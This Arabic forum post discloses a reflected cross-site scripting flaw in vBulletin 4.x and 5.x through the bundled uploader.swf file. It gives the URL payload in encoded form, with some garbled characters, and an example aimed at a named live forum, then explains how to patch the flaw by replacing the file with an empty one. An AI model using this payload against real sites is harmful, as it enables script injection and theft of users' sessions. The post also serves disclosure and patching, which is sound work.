ثغرة Xss تعمل على
vBulletin 4.X and 5.X
كود:
Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ***8203;9;}//
كود:
Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ***8203;9;}//
EX:
كود:
www.quadsuk.net/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(document.domain);}//
ترقيع الثغرة
لجميع نسخ الجيل الرابع :-
ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم
كود:
/clientscript/yui/uploader/assets/uploader.swf
لجميع نسخ الجيل الخامس :-
ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم
كود:
/core/clientscript/yui/uploader/assets/uploader.swf